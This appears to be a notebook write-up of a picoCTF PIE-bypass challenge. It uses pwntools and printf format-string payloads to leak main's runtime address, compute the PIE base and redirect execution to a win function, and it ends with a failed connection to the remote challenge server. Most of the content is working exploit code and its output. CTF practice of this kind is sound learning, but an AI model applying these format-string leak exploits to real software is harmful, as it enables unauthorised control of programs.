First, we check what kind of security features are enabled into the binary:

In [2]:
from pwn import *

vuln = context.binary = ELF('vuln', checksec=False)
print(vuln.checksec())

RELRO:      Full RELRO
Stack:      Canary found
NX:         NX enabled
PIE:        PIE enabled
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No


As expected from the challenge name, PIE is enabled, which means we will need two things:

1) The address of any given function at runtime.
2) The offset between that function and the win function in the .plt.got binary section.

Requirement 2 is easy enough to get with the pwn package. For now, we will save the `win` function's address:

In [27]:
win_offset = vuln.symbols['win']

print(hex(win_offset))

0x136a


Now, we will need to mess around with the buffer input in order to get an idea of the runtime address of the process. 

In [28]:
io = process('./vuln')
print(io.recvuntil(b':').decode())

payload = 'A' * 8 + '%08x.' * 10
io.sendline(payload.encode())
print(io.recvuntil(b':').decode())
io.sendline(b'0x0000')
print(io.recvall().decode())
io.close()

Enter your name:
AAAAAAAAb73182a1.fbad2088.48ce7d5f.b73182db.00000000.faa9efd0.00000000.41414141.78383025.30252e78.
 enter the address to jump to, ex => 0x12345:
 Segfault Occurred, incorrect address.



We can see that the buffer's address lies in the location of the 8th parameter call of the `printf` function, as evidenced by the output. 
That might be of use, but what would really help right now is if one of the addresses leaked by the input string can be dereferenced to reach the buffer.

To test that, we will need to check each address in the function stack:

In [29]:
for i in range(30):
    io = process('./vuln')
    io.recvuntil(b':')
    payload = 'A' * 8 + '|%' + str(i) + '$s|'
    io.sendline(payload.encode())
    try:
        out = io.recvuntil(b':').decode()
    except:
        continue
    if '|A' in out:
        print(i)
        print(out)

By the lack of an output, it seems we had no luck with the buffer address. However, the `printf` stack frame might also contain some function's address. 
To test that: 

In [33]:
import re

for i in range(30):
    io = process('./vuln')
    io.recvuntil(b':')
    payload = 'A' * 8 + '|%' + str(i) + '$p|'
    io.sendline(payload.encode())
    try:
        out = io.recvuntil(b':').decode()
        match = re.search(r'0x[0-9a-fA-F]+', out)
        if match:
            address = match.group(0)
            io.sendline(address.encode())
            out = io.recvline().decode()
    except:
        print('ErrorByte')
    if 'Segfault' not in out:
        print(i)
        print(out)


21
 
23
 Enter your name:



So (luckily) we ended up finding the address of some function through the leaked stack. \
However, due to the structure of the code, its hard to determine exactly WHICH function's address it is. \
There are three possibilities: the call site of the `printf` function inside `call_functions`; the actual runtime address of `call_functions`;
or even the runtime address of `main`.

This can be solved using GDB to determine which function's address matches the one we get from the leaked stack. From it, we conclude that it is actually main's address that we get! 

Now, it is a simple matter of combining requirements 1) and 2):

In [31]:
main_offset = vuln.symbols['main']

for i in range(30):
    io = process('./vuln')
    io.recvuntil(b':')
    payload = 'A' * 8 + '|%' + str(i) + '$p|'
    io.sendline(payload.encode())
    try:
        out = io.recvuntil(b':').decode()
        match = re.search(r'0x[0-9a-fA-F]+', out)
        if match:
            leaked_address = match.group(0)
            io.sendline(leaked_address.encode())
            out = io.recvline().decode()
    except:
        continue
    if 'Enter' in out:
        print(io.recvuntil(b':').decode(), end=' ')
        leaked_address = int(leaked_address, 16)
        pie_base = leaked_address - main_offset
        payload = pie_base + win_offset
        print(hex(payload))
        io.sendline(hex(payload).encode())
        print(io.recvall().decode())

 enter the address to jump to, ex => 0x12345: 0x5636639dc36a
 You won!
Cannot open file.



We can simply repeat the process to get the flag from the picoCTF server (the port variable is specific to each attempt):

In [35]:
main_offset = vuln.symbols['main']
port = 54048

for i in range(30):
    io = remote('rescued-float.picoctf.net', port)
    io.recvuntil(b':')
    payload = 'A' * 8 + '|%' + str(i) + '$p|'
    io.sendline(payload.encode())
    try:
        out = io.recvuntil(b':').decode()
        match = re.search(r'0x[0-9a-fA-F]+', out)
        if match:
            leaked_address = match.group(0)
            io.sendline(leaked_address.encode())
            out = io.recvline().decode()
    except:
        continue
    if 'Enter' in out:
        print(io.recvuntil(b':').decode(), end=' ')
        leaked_address = int(leaked_address, 16)
        pie_base = leaked_address - main_offset
        payload = pie_base + win_offset
        print(hex(payload))
        io.sendline(hex(payload).encode())
        print(io.recvall().decode())

[ERROR] Could not connect to rescued-float.picoctf.net on port 54048


PwnlibException: Could not connect to rescued-float.picoctf.net on port 54048